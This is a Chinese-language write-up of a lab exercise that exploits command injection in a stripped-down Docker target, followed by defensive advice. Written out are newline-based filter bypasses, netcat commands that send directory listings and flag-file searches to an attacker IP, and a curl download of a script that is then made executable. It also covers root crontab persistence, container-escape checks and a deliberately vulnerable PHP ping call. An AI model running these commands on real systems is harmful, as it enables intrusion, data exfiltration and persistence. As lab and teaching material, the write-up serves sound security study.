从‘恶意字符’到GetShell：一次完整的Docker靶机命令注入漏洞利用复盘-开发者社区

从‘恶意字符’到GetShell：受限Docker环境下的命令注入实战解析

在渗透测试领域，命令注入漏洞始终是攻击面最广、危害性最高的安全威胁之一。不同于常规靶机环境，当遇到未安装bash/python等解释器的精简Docker容器时，传统的反弹shell手段往往失效，这就需要安全研究员具备更灵活的漏洞利用思维。本文将完整复盘一个真实场景下的受限环境突破过程，重点展示如何通过OOB（Out-of-Band）技术实现信息外带，最终在无标准反弹shell的条件下完成漏洞利用。

1. 漏洞环境分析与初始突破

目标环境是一个仅提供基础网络工具（如ping、nc、curl）的Docker容器，管理员通过黑名单机制过滤了常见恶意字符。这种配置在物联网设备和云原生应用中相当普遍——开发者认为禁用危险函数就能高枕无忧，却忽略了命令拼接的潜在风险。

我们首先测试ping功能的基础注入点：

ping -c 1 127.0.0.1;whoami

当发现分号被过滤时，尝试用管道符绕过：

ping -c 1 127.0.0.1 | id

注意：不同系统对管道符的处理存在差异，Linux中|会执行右侧命令但丢弃左侧输出，而Windows的cmd会传递左侧输出。

经过多次测试，发现环境对以下字符敏感：

分号（;）
与符号（&）
反引号（`）
美元符号（$）

但换行符（%0a）和空格未被过滤，这为我们提供了突破口。最终构造的注入payload如下：

POST /ping HTTP/1.1 Host: target.com ... ip=127.0.0.1%0aid

2. 受限环境下的信息外带技术

由于目标容器没有bash/python，传统反向连接shell无法实现。我们采用Netcat（nc）进行数据外带，这种技术特别适合以下场景：

防火墙限制出站连接
目标系统缺少开发环境
需要隐蔽的数据传输

2.1 建立OOB通信通道

在攻击机（10.9.47.103）启动监听：

nc -lvvp 10020 > received_data.txt

目标端执行命令并通过nc回传结果：

ls / | nc 10.9.47.103 10020

这种技术的关键优势在于：

不依赖目标环境的具体解释器
可通过任意可用端口传输数据
能绕过部分IDS的反弹shell检测

2.2 自动化脚本部署方案

为提高效率，我们将操作流程脚本化。首先创建backview.sh：

#!/bin/sh ls -la / | nc 10.9.47.103 10020 find / -type f -name "*flag*" | nc 10.9.47.103 10021

通过Python3临时HTTP服务传输文件：

python3 -m http.server 80

在目标端使用curl获取脚本（注意避免使用可能被拦截的wget）：

curl http://10.9.47.103/backview.sh -o /tmp/bv.sh && chmod +x /tmp/bv.sh

3. 权限维持与横向移动

获得初步立足点后，需要解决两个核心问题：

如何保持访问权限
如何在容器内提升权限

3.1 持久化技术对比

方法	适用条件	隐蔽性	实现复杂度
Cron任务	有cron服务	中	低
SSH密钥注入	开放SSH端口	高	中
恶意服务注册	systemd可用	低	高
环境变量劫持	存在动态链接库加载	高	中

在本次环境中，我们发现可通过写入/etc/crontab实现持久化：

echo "* * * * * root /tmp/bv.sh" >> /etc/crontab

3.2 容器逃逸可能性评估

检查容器配置关键点：

cat /proc/self/status | grep CapEff ls -l /dev/* | grep docker mount | grep -i "shm\|docker.sock"

当发现以下情况时可能存在逃逸机会：

挂载了Docker socket文件
配置了危险的Linux能力集（如CAP_SYS_ADMIN）
共享了敏感主机目录

4. 防御策略与加固建议

针对此类漏洞，提供分层防御方案：

4.1 输入过滤最佳实践

采用白名单而非黑名单机制
对以下字符进行严格校验：
```
& | ; $ > < ` \n \t
```
使用正则表达式锚定（^和$）防止中间插入

4.2 安全编码示例

危险代码（PHP）：

system("ping -c 1 ".$_GET['ip']);

安全改进方案：

import subprocess import re def safe_ping(ip): if not re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip): raise ValueError("Invalid IP format") subprocess.run(['ping', '-c', '1', ip], check=True)